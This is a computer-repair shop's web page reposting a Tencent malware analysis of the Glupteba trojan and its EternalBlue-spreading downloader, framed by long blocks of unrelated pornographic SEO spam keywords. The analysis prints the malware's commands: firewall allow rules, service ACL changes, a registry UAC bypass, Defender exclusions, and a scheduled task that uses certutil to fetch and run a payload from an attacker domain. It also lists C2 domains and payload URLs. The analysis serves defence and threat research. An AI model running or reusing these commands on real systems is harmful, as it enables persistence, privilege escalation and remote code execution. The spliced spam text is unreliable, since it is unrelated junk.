国产精品久av福利在线观看_亚洲一区国产精品_亚洲黄色一区二区三区_欧美成人xxxx_国产精品www_xxxxx欧美_国产精品久久婷婷六月丁香_国产特级毛片

錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
Glupteba惡意代理木馬利用“永恒之藍”漏洞傳播,感染量激增

作者: 佚名  日期:2018-06-01 21:03:37   來源: 本站整理

 0×1 概述
近日騰訊御見威脅情報中心監測到大量下載Glupteba惡意代理木馬。不同以往的是,該惡意木馬并未通過Operation Windigo僵尸網絡進行傳播,而是通過其他的木馬下載器(Scheduled.exe)進行傳播。進一步溯源分析發現,該木馬下載器利用“永恒之藍”漏洞進行傳播,從而導致了該木馬的感染量的激增。
Glupteba木馬會繞過UAC,以管理員權限和系統權限運行,會創建防火墻策略,將木馬程序加入白名單;修改Windows Defender策略,將木馬程序添加到病毒查殺白名單。木馬會收集中毒電腦的隱私信息,利用中毒電腦挖礦。
0×2 詳細分析
Scheduled.exe分析:
scheduled.exe首先申請空間,釋放PE文件執行。將釋放的PE dump出來,發現是golang編寫的,利用IDA python腳本將函數重命名。釋放的PE首先執行寫入配置信息到注冊表HEKY_CURRENT_USER/Software/Microsoft/TestApp中。

寫入配置信息
然后判斷是否是管理員權限,如果不是,則利用寫注冊表  
"HKCU\Software\Classes\mscfile\shell\open\command"
然后通過啟動CompMgmtLauncher繞過UAC以管理員權限重新啟動自己。


運行CompMgmtLauncher
重啟后再判斷是否是系統權限,如果不是則通過以TrustedInstaller運行自己提高權限。

以TrustedInstaller運行
判斷自己路徑名是否是”C:\Windows\rss\csrss.exe”,如果不是則執行安裝邏輯。
首先會判斷是否在虛擬機中運行。

檢查VirtualBox
然后添加防火墻策略,并設置注冊表配置firewall鍵值為1,將程序啟動加入Windows防火墻的白名單。
cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\admin\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" enable=yes"
創建其他釋放文件相關目錄,并寫入注冊表
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\”的paths和processs下的子健。并且設置注冊表配置defender鍵值為1。

創建目錄文件夾
最后將自身移動到”C:\Windows\rss\”下,重命名”csrss.exe”,設置文件夾隱藏,并設置注冊表Software\Microsoft\Windows\CurrentVersion\RUN,最后重新啟動csrss.exe。

設置自啟
重啟后再向服務器注冊bot將服務器返回數據再寫入注冊表配置UUID(后續下載的CloudNet啟動需要)。

注冊bot
注冊bot完成后創建兩個任務分別用于執行自己和更新自己。
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f http://dp.fastandcoolest.com/scheduled.exe C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
然后再釋放3個sys文件和1個exe文件到目標目錄設置隱藏屬性,并加載驅動和exe。”C:\Windows\System32\drivers\”下釋放三個隱藏sys文件:
Winmon.sys用于隱藏對應PID進程。
WinmonFS.sys隱藏指定文件或目錄。
WinmonProcessMonitor.sys查找指定進程,并關閉。

WinmonFS.sys隱藏文件
C:\Windows\下釋放一個exe文件:
Windefender.exe
添加規則到windows defender。
cmd.exe /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
cmd.exe /C sc sdset WinmonFS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)cmd.exe /C sc sdset WinmonProcessMonitor D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
添加完規則后,會將服務器返回cloudnet.exe下載地址”http[:]//skynetstop.com/cloudnet.exe”寫入到注冊表配置信息中的CloudenetSource中,然后開啟6個線程。

創建線程
6個線程分別作用是:
1.監測服務更新
2.監測保護CloudNet
3.監測保護Defender
4.下載礦機和挖礦代理配置信息
5.監測全屏窗口時則下載其他軟件安裝
6.獲取掩碼利用永恒之藍攻擊局域網機器

第三方軟件下載

下載竊取瀏覽器個人數據插件

礦機

永恒之藍payload模塊下載app.exe
開啟線程后,再等待服務器指令,執行其他功能,例如上傳下載執行等功能。

部分功能函數
Windefender.exe分析:
windefender.exe同樣是由golang編寫,首先將自己寫入windows defender規則。
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
然后獲取注冊表配置信息CloudenetSource,去下載執行Cloudnet.exe。

下載Cloudnet.exe
Cloudnet分析:
首先讀取注冊表配置信息中的UUID并校檢。

讀取UUID
移動自己到目的文件夾下。

移動自身
寫注冊表自啟動后繼續在注冊表
“HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet”下寫入文件版本信息,路徑等信息。

設置自啟
設置注冊表完后,會訪問www.google.com判斷是否聯網,隨后在從100條硬編碼中隨機選擇一條并解密生成拼接成c2服務器。向該c2服務器發送信息。

第一次發送信息
隨后會繼續向c2服務器發送更詳細的本地信息。

第二次發送本地信息
隨后服務器會向受害機器發送驗證通信信息。

bot與C2認證
e為服務器向受害者機器發送的控制指令。

接收指令執行

0×3 關聯分析
分析發現,cloudnet.exe原來是Glupteba惡意木馬,Glupteba惡意木馬作為Operation Windigo組織用于部署僵尸網絡中的一部分首次出現,Operation Windigo組織通過Glupteba創建代理分發垃圾郵件。
此次發現的Glupteba雖然功能沒有太大變化,但是與以往通過Operation Windigo基礎設施分發下載不同,而是利用其他惡意木馬進行分發下載,并且作為主模塊使用,我們有理由相信Glupteba脫離Operation Windigo,成為自己僵尸網絡的一部分。

觀察過程中目前尚未發現Glupteba有其他動作,不排除僵尸網絡背后的操縱者出售地下代理服務,可用于垃圾郵件分發或者網絡攻擊等行為。

0×4 解決方案
騰訊御見威脅情報中心提醒用戶注意以下幾點:
1、服務器關閉不必要的端口,方法可參考:https://guanjia.qq.com/web_clinic/s8/585.html
2、推薦企業用戶安裝御點終端安全管理系統(https://s.tencent.com/product/yd/index.html)。御點終端安全管理系統具備終端殺毒統一管控、修復漏洞統一管控,以及策略管控等全方位的安全管理功能,可幫助企業管理者全面了解、管理企業內網安全狀況、保護企業安全。

IOC
C2:
https[:]//blumbergnew.com
https[:]//fastandcoolest.com
https[:]//mihan14500.com
https[:]//lentanewsland.com
http[:]//skynetstop.com
http[:]//gb1.wupdomain.com
http[:]//dp.fastandcoolest.com
http[:]//F0AE5A04-264A-432E-BC59-2DEDBC05E96E.server-3.0df.ru
http[:]//e8ebf79d-5dd2-4d98-9c45-e3231e8cc26c.server-17.0m1.ru
URL:
http[:]//dp.fastandcoolest.com/app/4/app.exe
http[:]//dp.fastandcoolest.com/scheduled.exe
http[:]//gb1.wupdomain.com/xme64-252.exe
http[:]//dp.fastandcoolest.com/deps.zip
http[:]//dp.fastandcoolest.com/app/3/app.exe
http[:]//dp.fastandcoolest.com/app.exe
http[:]//gb1.wupdomain.com/xme32-252-gcc.exe
http[:]//dp.fastandcoolest.com/thirdparty/lsa64install.exe
http[:]//dp.fastandcoolest.com/scheduled/3/scheduled.exe
http[:]//dp.fastandcoolest.com/ps.exe
http[:]//dp.fastandcoolest.com/mrt.exe
http[:]//dp.fastandcoolest.com/vc.exe


熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    97免费公开视频| 日韩精品一区在线观看| 日本精品另类| 免费av网站观看| 国产精品自拍视频一区| 99久久久无码国产精品性| 国语对白做受xxxxx在线中国| 日韩三级在线播放| 国产精品18毛片一区二区| 97超级碰碰碰久久久| 日韩最新免费不卡| 国产视频精品免费播放| 精品国产伦一区二区三区观看体验| 欧美色网站导航| 午夜久久久久久| 亚洲欧美日韩一区在线观看| 精品影片在线观看的网站| 99久久免费精品国产72精品九九| 伊人成综合网站| 黄色成人免费网| 欧美特黄aaaaaaaa大片| 成人免费网站www网站高清| 日韩av首页| 国产精品日韩精品中文字幕| 欧美午夜精品一区二区三区电影| 日韩av网址大全| 欧美偷窥清纯综合图区| 免费欧美日韩| 国产精品国模大尺度视频| 成人免费一区二区三区在线观看| 亚洲人一二三区| 欧美日韩亚洲精品一区二区三区 | 精品视频站长推荐| 99国产精品免费视频| 久久久精品福利| 国产伦一区二区| 中文在线字幕在线观看| 欧美日本黄色片| 国产精品白浆一区二小说| 一区二区三区视频免费看| 中文字幕资源网| xxxxx69·hd| 国产麻豆视频免费观看| 在线视频影院| 日本高清好狼色视频| 天堂√在线中文官网在线| 成人高清网站| 欲香欲色天天天综合和网| 99久久99热这里只有精品| 国产精品久久久久毛片大屁完整版| 久久99久久99精品免视看婷婷| 不卡在线观看av| 国产精品国产自产拍高清av王其| 亚洲精品成a人在线观看| 色综合久久悠悠| 国产精品27p| 欧美动漫一区二区| 日韩免费av一区二区| 色爱av综合网| 日本福利在线| 亚洲精品97久久| www久久日com| 国产精品99蜜臀久久不卡二区 | 不卡日韩av| 国产午夜久久| 四虎在线视频免费观看| 久久夜色精品国产噜噜av| 一级做a爱片性色毛片| 亚洲精品久久嫩草网站秘色| 免费成人美女女在线观看| 亚洲高清一区二区三区| 亚洲jizzjizz妇女| 欧美成人高清视频| 成人福利片网站| 人人妻人人澡人人爽精品日本 | 免费人成在线观看视频播放| 久久午夜色播影院免费高清| 全球最大av网站久久| 天天插天天操天天干| 国内精品二区| 成人午夜一级| 波多野吉衣中文字幕| 日韩午夜在线视频| 成人免费av资源| 国产成人久久精品77777综合 | 日韩精品成人一区二区三区| 自拍偷拍第9页| 国内精品小视频在线观看| 精品乱码一区二区三四区视频| 正在播放亚洲| 精品国产精品自拍| 国产精品久久久久久久久久白浆| 在线观看日韩一区二区| 相泽南亚洲一区二区在线播放 | 91香蕉视频在线观看| 久久久国产91| 麻豆免费在线视频| 欧在线一二三四区| 欧美一区二区久久久| 亚洲一区有码| 日本一区二区免费高清视频| 亚洲a级精品| 国模人体一区二区| 中文字幕日韩精品在线观看| 51xtv成人影院| 很污的网站在线观看| 欧美视频在线观看一区二区| 韩漫成人漫画| 天干夜夜爽爽日日日日| 国产精品91在线观看| 亚洲视频资源在线| 日本不卡一区二区三区| 免费男女羞羞的视频网站中文字幕妖精视频 | 欧美啪啪网站| 特一级黄色录像| 欧美高清不卡在线| 精品一区二区三区中文字幕| 国产 xxxx| 国产精品电影在线观看| 激情综合亚洲| 色综合久久久久久| 欧美特级黄色录像| 欧美成人精品一区| 久久精品国产77777蜜臀| 先锋影音欧美官网| 国产在线观看一区二区三区| 婷婷综合久久| 欧美日韩影视| 老司机成人免费视频| 久久精品视频在线观看免费| 欧美图区在线视频| 理论电影国产精品| 中文字幕免费一区二区三区| 欧美色图自拍| 国产无码精品在线观看| 干b视频在线观看| 国语自产精品视频在线看抢先版图片 | 丁香六月综合激情| 国产区一区二| 精品国产黄色片| 日韩在线第三页| 自拍亚洲一区欧美另类| 国产在线播放一区三区四| 欧美性猛交99久久久久99| 加勒比精品视频| 日本国产欧美一区二区三区| 亚洲国产精品一区二区尤物区| 成人久久精品| 国产二区在线播放| 国产乡下妇女做爰视频| 亚洲av综合一区二区| 日本在线观看一区二区三区| 亚洲激情在线观看视频免费| 亚洲精品二三区| 在线观看国产日韩| 欧美猛男男男激情videos| 99视频精品视频高清免费| 激情另类小说区图片区视频区| 噜噜噜天天躁狠狠躁夜夜精品| 国产日产一区二区三区| 国产免费高清| 国产成人亚洲欧美电影| 国产精品无码网站| 国产又爽又黄的激情精品视频| 色久欧美在线视频观看| 国产农村妇女精品| 欧美性aaa| 超碰97免费在线| 成人精品一区二区不卡视频 | 日韩电影在线观看中文字幕| 性人久久久久| 日韩伦理福利| 俄罗斯男人又粗又大| 久久精品视频7| 中文字幕在线看人| 国产日本在线播放| 国产欧美精品一区二区| 亚洲成人资源在线| 中文字幕一区二区三区蜜月| 欧美日韩dvd在线观看| 久久er精品视频| 中文字幕在线一区免费| 欧美男女性生活在线直播观看| 国产精品婷婷| 国产成人亚洲综合a∨猫咪| 午夜精品一区| 天堂91在线| 最新二区三区av| 性高潮视频在线观看| 国产主播在线看| 国产裸体写真av一区二区| 久久视频国产精品免费视频在线| 91麻豆精品久久久久蜜臀| 99国产精品99久久久久久| 少妇精品久久久一区二区三区| 国产精品888| 亚洲精品乱码久久久久久按摩观| 91精品国产一区二区三区香蕉| 欧美午夜视频一区二区| 女人天堂亚洲aⅴ在线观看|